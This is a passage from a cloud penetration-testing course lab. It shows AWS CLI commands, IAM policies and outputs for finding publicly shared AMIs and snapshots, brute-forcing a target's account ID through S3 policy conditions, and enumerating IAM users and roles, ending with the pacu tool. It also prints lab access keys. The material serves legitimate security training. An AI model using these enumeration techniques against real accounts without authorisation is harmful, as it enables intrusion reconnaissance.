If AWS CLI is not already installed, we can easily do it in Kali using the package manager.
kali@kali:~$ sudo apt update
...
kali@kali:~$ sudo apt install -y awscli
...
The following NEW packages will be installed:
awscli docutils-common python3-awscrt python3-docutils python3-jmespath python3-roman
(Reading database ... 461429 files and directories currently installed.)
...
Listing 15 - Installing AWS CLI in Kali Linux
To configure the credentials in AWS CLI, we'll use a named profile. This is a good practice, since during the lab we might need to interact with AWS as other IAM users; using profiles will make it easier to differentiate one IAM user from another and rapidly switch between them.
We'll run the aws configure --profile attacker command in the terminal. This will create a profile named attacker. When prompted, we'll set the values of attacker_access_key_id and attacker_access_key_secret provided when starting the lab.
To use the profile, we'll need to add the --profile attacker argument to every AWS command we run. Let's test this by running aws --profile attacker sts get-caller-identity. A JSON response with the user information proves that the credentials are valid and that we are interacting with the AWS API as the attacker IAM user.
kali@kali:~$ aws configure --profile attacker
AWS Access Key ID []: AKIAQO...
AWS Secret Access Key []: cOGzm...
Default region name []: us-east-1
Default output format []: json
kali@kali:~$ aws --profile attacker sts get-caller-identity
{
"UserId": "AIDAQOMAIGYU5VFQCHOI4",
"Account": "123456789012",
"Arn": "arn:aws:iam::123456789012:user/attacker"
}
Listing 16 - Configuring Profile and Validating Communication with AWS API
Once AWS CLI is properly configured with the attacker profile, we can proceed with the following sections of the lab.
24.3.2. Publicly Shared Resources
Some cloud assets, given the nature of their function, are inherently designed to be published on the internet, such as standard operating system images (Ubuntu, Debian, etc.) that organizations use as a building block for their EC2 instances. CSPs normally provide user-friendly ways to access these.
Alternatively, some cloud resources are designed for internal use, for example, custom-built machine images or snapshots of virtual drives and databases. Despite this, large organizations might have multiple public cloud accounts and need to share these resources between accounts or even publicly.
Warning
Ideally, these publicly-shared resources won't contain sensitive data and customers should do their part of the shared responsibility model and protect their assets. However, this is not always the case.
In this section, we are going to search and discover publicly-shared resources from offseclab.io. We'll focus on the following commonly used resources:
- Publicly-shared Amazon Machine Images (AMIs)
- Publicly-shared Elastic Block Storage (EBS) snapshots
- Relational Databases (RDS) snapshots
These shared resources commonly don't have a domain name or URL address to access them, so we'll need to use the CSP's API to request them.
Let's open the CLI, where we have the AWS CLI tool configured with the attacker's credentials. We'll search "Publicly Shared AMIs" as an example.
AMIs are virtual machine images containing a pre-installed operating system along with software and files. To deploy an EC2 instance in AWS, we must specify an AMI. We normally choose one from the public AMI Catalog, which contains images publicly shared by AWS, third-party partners, community, and other accounts. Let's use AWS CLI to list all these AMIs.
Warning
Unless otherwise specified, we'll be using the attacker profile, so we'll include in every command the --profile attacker argument.
The command ec2 describe-images will list all the images that the account can read. This will provide an extensive list of images as output. Let's include the --owners amazon argument to filter this list and show only AMIs provided by AWS.
Optionally, we can add the --executable-users all argument to ensure that all public AMIs will be listed, including any self-owned public AMIs.
Warning
Even filtering the results, the command below will take 30-60 seconds to complete.
kali@kali:~$ aws --profile attacker ec2 describe-images --owners amazon --executable-users all
{
"Images": [
{
"Architecture": "x86_64",
"CreationDate": "2022-06-29T09:46:55.000Z",
"ImageId": "ami-0d4f490f4e62171b4",
"ImageLocation": "amazon/Deep Learning Base AMI (Amazon Linux 2) Version 53.4",
"ImageType": "machine",
"Public": true,
"OwnerId": "898082745236",
"PlatformDetails": "Linux/UNIX",
"UsageOperation": "RunInstances",
"State": "available",
"BlockDeviceMappings": [
{
"DeviceName": "/dev/xvda",
"Ebs": {
"DeleteOnTermination": true,
"Iops": 3000,
"SnapshotId": "snap-0ce7f231ea72dd0ea",
"VolumeSize": 100,
...
Listing 17 - Listing All Public AMIs Owned by Amazon AWS
The output shows a list of public AMIs owned by Amazon. We can see several attributes of the AMIs, such as the ImageId, ImageLocation, CreationDate, PlatformDetails, and more.
To list all the AMIs owned by another account, we can change the value of the --owners argument to the target's Account ID. The account ID is a unique identifier for the AWS account that we get when we sign up in AWS.
We don't know the account ID of our target. However, we can leverage the filtering feature of the API to find resources by specifying other attributes.
The structure of a filter expression is as follows:
--filters "Name=filter-name,Values=filter-value1,filter-value2,..."
Listing 18 - The Filter Expression Format
Name refers to the attribute of the object we want to filter and Values refers to the content of that attribute. Therefore, to filter for AMIs that include the word "offseclab" in the description attribute, we'll set:
--filters "Name=description,Values=*Offseclab*"
Listing 19 - The Filter Expression Format for offseclab Word
We'll note that the *Offseclab* value uses the wildcard *, which matches any number of characters (including none) before and after the word "Offseclab".
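Conceptually, this wildcard behaves like shell glob matching. As a loose analogy (illustrative shell code, not the AWS API's implementation), we can check which candidate strings a *Offseclab* pattern would match:

```shell
# Analogy: how a "*Offseclab*" pattern matches candidate strings,
# illustrated with shell glob matching (case), not the AWS API itself.
for name in "Offseclab Base AMI" "my-Offseclab-test" "unrelated-image"; do
  case "$name" in
    *Offseclab*) echo "MATCH: $name" ;;
    *)           echo "no match: $name" ;;
  esac
done
```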
kali@kali:~$ aws --profile attacker ec2 describe-images --executable-users all --filters "Name=description,Values=*Offseclab*"
{
"Images": []
}
Listing 20 - Listing All Public AMIs After Filtering the List Using the Keyword "description"
We got a response with an empty list, meaning that there were no images that matched our filter.
Another attribute that the user can set when creating the image is the name, so let's try filtering by that one.
kali@kali:~$ aws --profile attacker ec2 describe-images --executable-users all --filters "Name=name,Values=*Offseclab*"
{
"Images": [
{
"Architecture": "x86_64",
"CreationDate": "2023-08-05T19:43:29.000Z",
"ImageId": "ami-0854d94958c0a17e6",
"ImageLocation": "123456789012/Offseclab Base AMI",
"ImageType": "machine",
"Public": true,
"OwnerId": "123456789012",
"PlatformDetails": "Linux/UNIX",
"UsageOperation": "RunInstances",
"State": "available",
"BlockDeviceMappings": [
{
"DeviceName": "/dev/xvda",
"Ebs": {
"DeleteOnTermination": true,
"SnapshotId": "snap-098dc18c797e4f255",
"VolumeSize": 8,
"VolumeType": "gp2",
"Encrypted": false
}
}
],
"EnaSupport": true,
"Hypervisor": "xen",
"Name": "Offseclab Base AMI",
"RootDeviceName": "/dev/xvda",
"RootDeviceType": "ebs",
"SriovNetSupport": "simple",
"Tags": [
{
"Key": "Name",
"Value": "Offseclab Base AMI"
}
],
"VirtualizationType": "hvm",
"DeprecationTime": "2023-08-05T21:43:00.000Z"
}
]
}
Listing 21 - Listing All Public AMIs After Filtering the List Using the Keyword "name"
This time we got a match and found one AMI. We also got the account ID that most likely belongs to the target organization. With the account ID, we can search for more AMIs or other resources; we'll leave that as an exercise for the end of this section.
Similarly, we can seek publicly-shared EBS snapshots using the ec2 describe-snapshots command.
kali@kali:~$ aws --profile attacker ec2 describe-snapshots --filters "Name=description,Values=*offseclab*"
{
"Snapshots": []
}
Listing 22 - Listing Public Snapshots After Filtering the List Using the Keyword "description"
We didn't find any other resources, but this gives us an idea of how to use the CSP's API features to search for publicly-shared resources.
There isn't a golden rule for this, though. The search will depend on the type of resource, the service API, the public CSP, etc. The best way to approach this is to investigate publicly-exposable resources in specific CSPs (e.g. AWS) and consult the documentation for the services we want to try.
Finding these types of resources widens the attack surface and opens new attack vectors to try. For instance, with the AMI found in offseclab.io, we can try launching an EC2 instance from that image and searching it for sensitive data. Even if we don't find information that grants us direct access to the cloud infrastructure, we can still learn more about our target.
Labs
- Why might large organizations share cloud resources publicly or between accounts?
A) To reduce costs associated with cloud storage
B) To facilitate internal operations and resource sharing
C) To ensure all resources contain sensitive data
D) To avoid using CSP's API for resource access
- What is the purpose of the --owners amazon argument in the AWS CLI command?
A) To list all images owned by the current account
B) To list all images that are publicly available
C) To list all images owned by AWS
D) To list all images that contain the keyword "amazon"
- Use the account ID to search for other publicly shared resources. You will find a 1 GB-sized snapshot (VolumeSize: 1). Copy the description of the newly found resource and paste it into the answer box. (This resource is not really publicly shared, but we should be able to list it with the provided credentials for the lab.)
24.3.3. Obtaining Account IDs from S3 Buckets
In the previous section, we discovered the AWS account ID of the target by finding publicly-shared resources through the AWS API. In this case, we'll assume that there are no publicly shared resources, so we can't get the account ID that way.
In this section, we'll learn a technique that abuses the API's features and capabilities to obtain the target's account ID from a publicly-shared S3 bucket or object.
To perform this technique, the attacker needs an AWS account to interact with the AWS API. We'll use the attacker profile in the AWS CLI to simulate this scenario. Additionally, the target account must have a publicly readable S3 bucket, which this lab's target account does.
Warning
In this lab the attacker profile we configured is a user that belongs to the target account. However in a real scenario, this user would belong to an external account.
We'll begin by creating an IAM user that, by default, has no permissions to execute actions. Then we'll add a policy granting read access to the bucket, with a Condition that the permission only applies if the account ID that owns the bucket starts with the digit "x". If we can't read the bucket, we'll keep trying other digits until the listing succeeds, revealing the first digit of the account ID where the bucket resides. We can then iterate over the remaining positions until we recover the entire account ID.
First, we'll choose a publicly-readable bucket or object inside the target account. Because the bucket/object is publicly-readable, we should be able to list the content of it with any IAM user of any AWS account. In the lab, we'll choose one of the publicly-readable buckets.
Then, we'll create a new IAM user in our attacker account. By default, IAM users don't have any permissions to execute any actions, so the new user won't be able to list the content of the public resource even when it's public.
Next, we'll create a policy that will grant permissions to list buckets and read objects. However, we'll add the Condition that the read permission will only apply if the account ID that owns the bucket starts with the digit "x".
After we apply the policy to the new IAM user, we'll test if we can list the bucket with the new user's credentials. We'll test the value x from 0 to 9 until we can list the bucket, meaning that we found the first digit of the account.
Warning
This technique is tailored for AWS. However, it shows how APIs can be exploited to retrieve information beyond their intended purpose, a tactic that can be relevant in various platforms and contexts.
Let's check how this works in our lab. We can use the offseclab-assets-public-... bucket, which is publicly-readable. If it wasn't readable, we could also use a publicly-readable object on the bucket, such as any of the images of the website.
To begin, let's retrieve the bucket name again.
Warning
The bucket name has a random string that changes every time we restart the lab. We need to check the new name every time we restart the lab.
We can browse the website www.offseclab.io and get the bucket name from the URL of any of the images in the website as we did previously. This time, however, we will use curl to perform this task.
First, we'll fetch the HTML source of the main site using curl -s www.offseclab.io. The -s flag suppresses the progress meter that curl displays by default.
In our next step, we'll pipe the output to grep to filter out a particular string or pattern, aiming to extract the bucket's name. This bucket's name begins with the prefix "offseclab-assets-public-" and is followed by a random sequence of eight alphanumeric characters. This is represented as the regular expression offseclab-assets-public-\w{8}. The -P flag instructs grep to interpret the pattern using perl-regexp syntax. Since the default behavior of grep is to display the entire line where the pattern is found, we'll use -o to display just the matched portion.
kali@kali:~$ curl -s www.offseclab.io | grep -o -P 'offseclab-assets-public-\w{8}'
offseclab-assets-public-kaykoour
offseclab-assets-public-kaykoour
offseclab-assets-public-kaykoour
offseclab-assets-public-kaykoour
Listing 23 - Getting the Name of the Public Bucket with curl
The output shows four matches, one for every image in the homepage source code. We can copy the bucket name from the output.
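Instead of copying it manually, we can capture the bucket name into a shell variable for reuse in later commands. The sketch below runs the same grep pipeline against a small inline HTML sample (hypothetical markup); against the live site, we would feed it the output of curl -s www.offseclab.io instead:

```shell
# Sketch: capture the bucket name into a variable for later commands.
# Demonstrated against an inline HTML sample (hypothetical markup);
# for the live site, replace the sample with: curl -s www.offseclab.io
html='<img src="https://offseclab-assets-public-kaykoour.s3.amazonaws.com/sites/www/images/logo.svg">'
bucket=$(printf '%s\n' "$html" | grep -o -P 'offseclab-assets-public-\w{8}' | sort -u | head -n 1)
echo "$bucket"
```

The sort -u collapses the duplicate matches, and head -n 1 keeps a single name.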
Last time, we validated that the bucket was publicly-accessible by listing the content in the web browser. We'll use the AWS CLI tool this time. To list the content of the bucket, we can use the s3 ls command.
kali@kali:~$ aws --profile attacker s3 ls offseclab-assets-public-kaykoour
PRE sites/
Listing 24 - Listing the Public Bucket as the attacker
In a real scenario, we'd be running this command from our own AWS account, so a successful listing would indicate that the bucket has an ACL or policy granting read access to all accounts.
Now, let's create a new IAM user with the iam create-user --user-name enum command. Let's keep in mind that this user resides in the attacker-controlled AWS account.
Next, we'll also create access keys for the IAM user, so we can interact as this user with the AWS API through the AWS CLI tool. We'll run the iam create-access-key --user-name enum command and take note of the AccessKeyId and SecretAccessKey in the output.
kali@kali:~$ aws --profile attacker iam create-user --user-name enum
{
"User": {
"Path": "/",
"UserName": "enum",
"UserId": "AIDAQOMAIGYU4HTPEJ32K",
"Arn": "arn:aws:iam::123456789012:user/enum"
}
}
kali@kali:~$ aws --profile attacker iam create-access-key --user-name enum
{
"AccessKey": {
"UserName": "enum",
"AccessKeyId": "AKIAQOMAIGYURE7QCUXU",
"Status": "Active",
"SecretAccessKey": "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"
}
}
Listing 25 - Creating the IAM User "enum" and Generating AccessKeyId and SecretAccessKey for that User
To interact as the new IAM user, we'll create a profile in the AWS CLI with the newly-created access keys. We'll run aws configure --profile enum and input the Access Key ID and Secret Access Key.
Once the profile is created, we just need to add the --profile enum argument to every command we want to run as the enum user. Let's try this by running aws sts get-caller-identity --profile enum. This will return the UserId, Account, and ARN (Amazon Resource Name) of the identity interacting with the API.
kali@kali:~$ aws configure --profile enum
AWS Access Key ID [None]: AKIAQOMAIGYURE7QCUXU
AWS Secret Access Key [None]: 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
Default region name [None]: us-east-1
Default output format [None]: json
kali@kali:~$ aws sts get-caller-identity --profile enum
{
"UserId": "AIDAQOMAIGYU4HTPEJ32K",
"Account": "123456789012",
"Arn": "arn:aws:iam::123456789012:user/enum"
}
Listing 26 - Configuring AWS CLI with Profile "enum"
Newly-created users with no policies attached are almost fully restricted from accessing any resource, even listing public buckets in other AWS accounts. However, we can provide access by creating a policy that allows a very specific action, such as listing a public bucket. If we add a condition that checks if the account number owning the S3 bucket starts with a specific number, we can enumerate and extract the account number.
Before proceeding, we need to address a key difference between our lab environment and a real attack. In a real attack, the enum user resides in the attacker's AWS Account. In our lab environment, both the enum user and the target bucket are on the same AWS account. This forces us to slightly change the exploit. Instead of listing the public bucket, we'll list the private bucket. The reason for this is that even though an IAM user doesn't have a policy attached granting permission to list buckets, the user can still read the public buckets in the same account the user resides in. This is expected behavior with the AWS API.
The rest of the exploit works the same. We only need to list the private bucket instead of the public bucket. This will simulate an attacker enumerating from a different AWS account.
Because the new enum user has no policies yet, all actions are implicitly denied by default. This means that if we try to list the bucket's contents with this user, we'll receive an AccessDenied error.
kali@kali:~$ aws --profile enum s3 ls offseclab-assets-private-kaykoour
An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
Listing 27 - Listing the Private Bucket with the enum User
Now, let's write a policy that will allow for listing the content of the bucket and reading objects inside it.
We'll name the policy document policy-s3-read.json.
# policy-s3-read.json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowResourceAccount",
"Effect": "Allow",
"Action": [
"s3:ListBucket",
"s3:GetObject"
],
"Resource": "*",
"Condition": {
"StringLike": {"s3:ResourceAccount": ["0*"]}
}
}
]
}
Listing 28 - Policy to Allow Listing Buckets and Reading Objects
We can use our favorite text editor to write the policy. In the example below, we use nano. After copying and pasting the content of the policy, we'll display it again and analyze it.
kali@kali:~$ nano policy-s3-read.json
kali@kali:~$ cat -n policy-s3-read.json
1 {
2 "Version": "2012-10-17",
3 "Statement": [
4 {
5 "Sid": "AllowResourceAccount",
6 "Effect": "Allow",
7 "Action": [
8 "s3:ListBucket",
9 "s3:GetObject"
10 ],
11 "Resource": "*",
12 "Condition": {
13 "StringLike": {"s3:ResourceAccount": ["0*"]}
14 }
15 }
16 ]
17 }
Listing 29 - Creating the policy document file
The policy allows (line 6) listing buckets (line 8) and reading any object in them (line 9). The * wildcard in the Resource attribute (line 11) means the actions are allowed for any bucket and object in any account. On lines 12-14, we add a condition that makes the policy apply only if the account ID hosting the resource (s3:ResourceAccount) starts with "0", followed by any other digits (hence the trailing wildcard).
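Since we'll iterate the condition value digit by digit, we can sketch the ten candidate values for the first position with a short loop:

```shell
# Sketch: print the ten candidate StringLike values for the first
# digit of the account ID. Each one would replace the condition
# value in policy-s3-read.json before re-applying the policy.
for d in 0 1 2 3 4 5 6 7 8 9; do
  printf '"StringLike": {"s3:ResourceAccount": ["%s*"]}\n' "$d"
done
```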
We'll associate this policy with the enum IAM user with an inline policy using the iam put-user-policy command.
Using the --user-name enum argument, we can specify the name of the IAM user.
The --policy-name argument lets us set a name for the policy. This is just for reference. We'll name the policy s3-read.
The --policy-document argument expects a string with the policy in JSON format. The prefix file:// instructs the tool to read the policy from policy-s3-read.json.
The command will not return output if the policy was successfully applied. However, we can verify it using the iam list-user-policies --user-name enum command.
kali@kali:~$ aws --profile attacker iam put-user-policy \
--user-name enum \
--policy-name s3-read \
--policy-document file://policy-s3-read.json
kali@kali:~$ aws --profile attacker iam list-user-policies --user-name enum
{
"PolicyNames": [
"s3-read"
]
}
Listing 30 - Attaching the s3-read Inline Policy to the enum IAM User
According to the policy we set, the user will be able to read the content of the bucket only if the account ID where the bucket resides starts with "0". In our lab, our account is "123456789012". It doesn't start with "0", so we'll get an AccessDenied error when trying to list the bucket.
If we change the policy in the file and apply it again to the enum user, we'll be able to list the bucket. This time it works because our account starts with the digit "1".
Warning
Policies take a few seconds to be active after they are applied, so we might need to wait 10-15 seconds each time we test.
We can run aws --profile attacker sts get-caller-identity to retrieve the account ID of our lab. This will help us validate our technique.
kali@kali:~$ aws --profile enum s3 ls offseclab-assets-private-kaykoour
An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
kali@kali:~$ nano policy-s3-read.json
kali@kali:~$ cat -n policy-s3-read.json
1 {
2 "Version": "2012-10-17",
3 "Statement": [
4 {
5 "Sid": "AllowResourceAccount",
6 "Effect": "Allow",
7 "Action": [
8 "s3:ListBucket",
9 "s3:GetObject"
10 ],
11 "Resource": "*",
12 "Condition": {
13 "StringLike": {"s3:ResourceAccount": ["1*"]}
14 }
15 }
16 ]
17 }
kali@kali:~$ aws --profile attacker iam put-user-policy \
--user-name enum \
--policy-name s3-read \
--policy-document file://policy-s3-read.json
kali@kali:~$ aws --profile enum s3 ls offseclab-assets-private-kaykoour
PRE sites/
Listing 31 - Changing the Condition in the Policy and Testing Again
Once we've found the first digit of the account ID, we can move on to the next position by modifying the condition of the policy like so:
- "StringLike": {"s3:ResourceAccount": ["10*"]}
- "StringLike": {"s3:ResourceAccount": ["11*"]}
...
- "StringLike": {"s3:ResourceAccount": ["18*"]}
- "StringLike": {"s3:ResourceAccount": ["19*"]}
Listing 32 - Modifying the Policy Condition Statement to Brute Force the AccountID
We can automate this process programmatically and build an application to obtain the account ID from a publicly-accessible bucket or object.
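As a rough sketch of that automation, the loop below regenerates the policy document for each candidate digit. To keep it self-contained, it only prints the AWS CLI commands it would run (a dry run); in a real run, we would execute them, wait a few seconds for the policy to propagate, and check the exit status of the s3 ls call. The bucket and profile names are the lab's examples:

```shell
#!/bin/bash
# Dry-run sketch of the account-ID brute force: for each candidate
# digit, write the policy document and print the commands that a
# real run would execute. Bucket/profile names are lab examples.
bucket="offseclab-assets-private-kaykoour"
known=""                                   # digits recovered so far

for d in 0 1 2 3 4 5 6 7 8 9; do
  prefix="${known}${d}"
  cat > /tmp/policy-s3-read.json <<EOF
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowResourceAccount",
      "Effect": "Allow",
      "Action": ["s3:ListBucket", "s3:GetObject"],
      "Resource": "*",
      "Condition": {
        "StringLike": {"s3:ResourceAccount": ["${prefix}*"]}
      }
    }
  ]
}
EOF
  echo "aws --profile attacker iam put-user-policy --user-name enum --policy-name s3-read --policy-document file:///tmp/policy-s3-read.json"
  echo "aws --profile enum s3 ls ${bucket}   # exit code 0 => account ID starts with ${prefix}"
done
```

On a success, we would append the matching digit to known, restart the digit loop, and repeat until all twelve digits are recovered.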
Tools such as s3-account-search also implement this technique, although this one uses roles instead of users to link the policy to the condition.
As we can observe, there are several ways to implement this. The key concept is leveraging the Condition feature of IAM policies to control cross-account access. We used S3 because publicly-readable S3 objects are more common than other resources, but in theory, this technique works with other services as well.
Labs
- What is the main objective of the technique described in the text?
A) To create IAM users with full access to all AWS resources.
B) To obtain the target's AWS account ID from a publicly-shared S3 bucket or object.
C) To restrict access to S3 buckets using IAM policies.
D) To list all S3 buckets in an AWS account.
- How is the publicly-readable bucket name initially obtained?
A) By guessing the bucket name based on common naming conventions.
B) By accessing the AWS management console.
C) By retrieving it from the URL of any image on the website using the curl command.
D) By querying the AWS CLI tool directly.
- What AWS CLI command is used to list the contents of a bucket?
A) aws s3 cp
B) aws s3 mb
C) aws s3 ls
D) aws s3 rm
24.3.4. Enumerating IAM Users in Other Accounts
In the previous section, we examined a case where the API was misused to obtain the account ID of a target. In this section, we will continue to build upon the previous lab. We'll learn about another example of API abuse that enumerates internal IAM identities when we know the AWS account ID of the target.
Previously, we leveraged resources that had either publicly accessible permissions or, at the very least, permissions that granted read access to the attacker's account. We need to be aware of the latter because an important concept in this case is that sometimes we want a cloud resource to be publicly available on the internet, but at other times, we may want a resource to be accessible only to specific accounts. In AWS, this is referred to as cross-account access.
To configure cross-account access through IAM policies, we specify the account to be granted access and, optionally, a specific IAM identity (User, Group, or Role) within that account. We do this by setting the policy's Principal attribute. When the policy is applied, AWS validates the existence of that identity and returns an error if it doesn't exist.
Typically, we use the Amazon Resource Name (ARN) to specify an IAM identity, as shown below:
"Principal": {
"AWS": ["arn:aws:iam::AccountID:user/user-name"]
}
Listing 33 - Example of a Principal Definition Inside a policy
The identity's ARN follows a standard format. We can craft one by modifying the account ID and the IAM user's username. For example, if the attacker wants to test whether the cloudadmin user exists in the account 123456789012, the Principal definition of the policy should be:
"Principal": {
"AWS": ["arn:aws:iam::123456789012:user/cloudadmin"]
}
Listing 34 - Example of a Principal Definition Specifying the ARN of an IAM user
The attacker can then attach this policy to a resource they own; if applying it fails, the user doesn't exist.
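Crafting the candidate ARNs is simple string formatting. A minimal sketch, assuming the lab's example account ID and a guessed username wordlist:

```shell
# Sketch: craft candidate principal ARNs from a username wordlist.
# The account ID is the lab's example value; usernames are guesses.
account_id="123456789012"
for user in cloudadmin admin devops backup terraform; do
  printf 'arn:aws:iam::%s:user/%s\n' "$account_id" "$user"
done
```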
Let's observe how this works in our lab.
Warning
In the previous section, we already retrieved the account ID of the target's AWS account. The account will change after restarting the lab. We can either repeat the technique or we can get the account in the info box after starting the lab.
First, let's create an S3 bucket inside our attacker's account. The command aws s3 mb s3://offseclab-dummy-bucket-$RANDOM-$RANDOM-$RANDOM will create a bucket with the name offseclab-dummy-bucket, followed by random integer values to ensure that the bucket name is unique.
kali@kali:~$ aws --profile attacker s3 mb s3://offseclab-dummy-bucket-$RANDOM-$RANDOM-$RANDOM
make_bucket: offseclab-dummy-bucket-28967-25641-13328
Listing 35 - Creating a S3 Bucket in the attacker's Account
By default, the newly-created bucket is private. Now we are going to define a policy document in which we'll grant read permission only to a specific IAM user in the target account. We can use any text editor of our preference to write the policy. We'll use the ARN we crafted earlier to test if the cloudadmin user exists in the account 123456789012.
kali@kali:~$ nano grant-s3-bucket-read.json
kali@kali:~$ cat grant-s3-bucket-read.json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowUserToListBucket",
"Effect": "Allow",
"Resource": "arn:aws:s3:::offseclab-dummy-bucket-28967-25641-13328",
"Principal": {
"AWS": ["arn:aws:iam::123456789012:user/cloudadmin"]
},
"Action": "s3:ListBucket"
}
]
}
Listing 36 - Policy Granting Permission to List the Bucket to a Single IAM User
Now that we have our policy document, we are ready to attach it to the bucket using the aws s3api put-bucket-policy command.
The --bucket flag specifies the name of the S3 bucket to which the policy should be applied. In this case, the name of the bucket is offseclab-dummy-bucket-28967-25641-13328.
The --policy file://grant-s3-bucket-read.json argument specifies the policy that will be attached. Because our policy is defined in grant-s3-bucket-read.json, we must use the prefix file:// to instruct AWS CLI to read the policy from that file.
If no error returns after running the command, our policy was applied successfully. This also means that the cloudadmin user exists in the target account.
kali@kali:~$ aws --profile attacker s3api put-bucket-policy --bucket offseclab-dummy-bucket-28967-25641-13328 --policy file://grant-s3-bucket-read.json
kali@kali:~$
Listing 37 - Attaching the Resource Based Policy to the Test Bucket
Next, let's copy the policy to create a new one - but this time, we'll grant privileges to a nonexistent principal.
kali@kali:~$ cp grant-s3-bucket-read.json grant-s3-bucket-read-userDoNotExist.json
kali@kali:~$ nano grant-s3-bucket-read-userDoNotExist.json
kali@kali:~$ cat grant-s3-bucket-read-userDoNotExist.json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowUserToListBucket",
"Effect": "Allow",
"Resource": "arn:aws:s3:::offseclab-dummy-bucket-28967-25641-13328",
"Principal": {
"AWS": ["arn:aws:iam::123456789012:user/nonexistant"]
},
"Action": "s3:ListBucket"
}
]
}
kali@kali:~$ aws --profile attacker s3api put-bucket-policy --bucket offseclab-dummy-bucket-28967-25641-13328 --policy file://grant-s3-bucket-read-userDoNotExist.json
An error occurred (MalformedPolicy) when calling the PutBucketPolicy operation: Invalid principal in policy
Listing 38 - Editing the Policy Specifying a Non-existing User and Testing Again
When we tried to attach a resource-based policy to a bucket granting permissions to a Principal that does not exist, the API returned an error message stating 'Invalid principal in policy'. The error message may mislead us into thinking that there is something wrong with the definition of the principal in the policy, but it actually occurs because the API couldn't internally validate the existence of the principal.
We can automate this process to obtain a valid enumeration technique that will indicate whether a Principal exists. In our example, we checked the existence of an IAM user, but we can also define other principals such as groups and roles.
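A sketch of what that automation could look like: the Python below builds one test policy per candidate username, reusing the exact policy shape from Listing 36. Each document would then be attached with aws s3api put-bucket-policy, treating a MalformedPolicy error as proof that the principal does not exist. The function name and candidate list are assumptions for illustration:

```python
import json

def principal_probe_policy(bucket: str, principal_arn: str) -> str:
    # Same policy shape as Listing 36, parameterized per candidate principal.
    return json.dumps({
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "AllowUserToListBucket",
            "Effect": "Allow",
            "Resource": f"arn:aws:s3:::{bucket}",
            "Principal": {"AWS": [principal_arn]},
            "Action": "s3:ListBucket",
        }],
    })

bucket = "offseclab-dummy-bucket-28967-25641-13328"
for user in ["cloudadmin", "backup", "deploy"]:  # hypothetical candidates
    doc = principal_probe_policy(bucket, f"arn:aws:iam::123456789012:user/{user}")
    # Attach the document with:
    #   aws s3api put-bucket-policy --bucket <bucket> --policy <doc>
    # Success -> the principal exists; MalformedPolicy -> it does not.
```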
The concept of abusing the API to enumerate users in another account can be applied using roles and the AssumeRole action. When we create a role, we need to set a trust policy that specifies the principals that will have permission to assume that role. Similarly, as it happened with the resource-based policy of the S3 bucket, an error will occur if the Principal does not exist.
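The trust-policy variant of the probe can be sketched the same way. Note that (as pacu's module help later confirms) an explicit Deny is used so the probe never actually grants access; the function name is an assumption:

```python
import json

def probe_trust_policy(principal_arn: str) -> str:
    # Trust policy naming a candidate principal. Updating a role's
    # trust (AssumeRole) policy with it fails if the principal does
    # not exist. The explicit Deny keeps the probe from opening any
    # real access in the attacker's account.
    return json.dumps({
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Deny",
            "Principal": {"AWS": principal_arn},
            "Action": "sts:AssumeRole",
        }],
    })
```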
Let's suppose we have a large list of potential role names we want to test by brute force using this enumeration technique. For this lab, we'll limit our list to a few options. This not only saves time, but also accounts for the fact that our demonstration runs against a live service provider. Let's create a list of 10 potential role names to try. Typically, we'd look for roles related to the target's activities. We can even use AI tools to help build a more extensive list.
kali@kali:~$ echo -n "lab_admin
security_auditor
content_creator
student_access
lab_builder
instructor
network_config
monitoring_logging
backup_restore
content_editor" > /tmp/role-names.txt
Listing 39 - Creating a List of Roles to Search in the Account
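When expanding such a list with naming-convention guesses (environment prefixes, team names, and so on), a few lines of Python go a long way. The prefixes below are assumptions for illustration only:

```python
from itertools import product

prefixes = ["dev", "prod", "staging"]        # assumed naming prefixes
bases = ["lab_admin", "security_auditor"]    # entries from the base list
candidates = [f"{p}-{b}" for p, b in product(prefixes, bases)]

print(len(candidates))   # 6
print(candidates[0])     # dev-lab_admin
```

The resulting list can be written to a file and fed to the same enumeration technique.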
In this case, we'll use a popular tool named pacu that can automate this technique of user and role enumeration. This tool is available in Kali's official repositories and can be installed by running the following commands:
kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install pacu
Listing 40 - Installing pacu in Kali Linux Using the Package Manager
After installation completes, we'll be ready to use the tool. We can run pacu -h to display the usage help. This will also verify that the tool is successfully installed.
kali@kali:~$ pacu -h
usage: pacu [-h] [--session] [--activate-session] [--new-session] [--set-keys] [--module-name] [--data] [--module-args]
[--list-modules] [--pacu-help] [--module-info] [--exec] [--set-regions [...]] [--whoami]
options:
-h, --help show this help message and exit
--session <session name>
--activate-session activate session, use session arg to set session name
--new-session <session name>
--set-keys alias, access id, secrect key, token
--module-name <module name>
--data <service name/all>
--module-args <--module-args='--regions us-east-1,us-east-1'>
--list-modules List arguments
--pacu-help List the Pacu help window
--module-info Get information on a specific module, use --module-name
--exec exec module
--set-regions [ ...]
<region1 region2 ...> or <all> for all
--whoami Display information on current IAM user
Listing 41 - Getting the pacu Usage Help
Next, we'll run pacu without any other arguments to start it in interactive mode. Pacu separates assessments into sessions. The first time we run pacu, it will prompt for a name to create a session. Let's create a session and name it offseclab.
Once the session is created, it will display a list of available commands and, eventually, we'll get a new command prompt showing that we are in interactive mode within the offseclab session.
kali@kali:~$ pacu
....
Database created at /root/.local/share/pacu/sqlite.db
What would you like to name this new session? offseclab
Session offseclab created.
...
Pacu (offseclab:No Keys Set) >
Listing 42 - Starting pacu in Interactive Mode
First, we'll notice the message No Keys Set in the prompt. We can quickly set keys from the AWS CLI credentials file with the import_keys command, specifying a profile configured in AWS CLI. Let's import the attacker profile. We can also check that the command prompt changed, showing that we now have keys available.
Pacu (offseclab:No Keys Set) > import_keys attacker
Imported keys as "imported-attacker"
Pacu (offseclab:imported-attacker) >
Listing 43 - Importing the attacker Profile Credentials in pacu
Pacu implements modules to conduct different types of assessments against AWS accounts. We can list all the available modules with the ls command.
Most of the modules require credentials in the target account. We'll browse through the list of modules and search for the RECON_UNAUTH category. We are interested in the one that seems related to enumerating roles.
Pacu (offseclab:imported-attacker) > ls
...
[Category: RECON_UNAUTH]
iam__enum_roles
iam__enum_users
...
Listing 44 - Listing Modules in pacu
